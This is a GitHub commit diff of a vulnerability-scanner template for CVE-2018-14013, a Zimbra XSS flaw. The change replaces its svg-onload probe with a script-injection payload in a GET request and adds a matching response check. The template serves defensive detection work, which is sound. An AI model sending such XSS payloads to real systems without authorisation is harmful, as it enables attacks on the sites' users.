Update CVE-2018-14013.yaml

patch-1
Prince Chaddha 2021-08-03 13:13:57 +05:30 committed by GitHub
parent 317a63ec9c
commit c4acd62307
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 4 additions and 3 deletions

View File

@ -1,22 +1,23 @@
id: CVE-2018-14013 id: CVE-2018-14013
info: info:
name: Zimbra XSS. name: Zimbra XSS
author: pikpikcu author: pikpikcu
severity: medium severity: medium
description: Synacor Zimbra Collaboration Suite Collaboration before 8.8.11 has XSS in the AJAX and html web clients.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-14013 reference: https://nvd.nist.gov/vuln/detail/CVE-2018-14013
tags: cve,cve2018,xss,zimbra tags: cve,cve2018,xss,zimbra
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3Csvg%20onload%3Dalert%28document.domain%29%3E" - "{{BaseURL}}/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
words: words:
- '<svg onload=alert(document.domain)>' - '</script><script>alert(document.domain)</script>'
part: body part: body
- type: status - type: status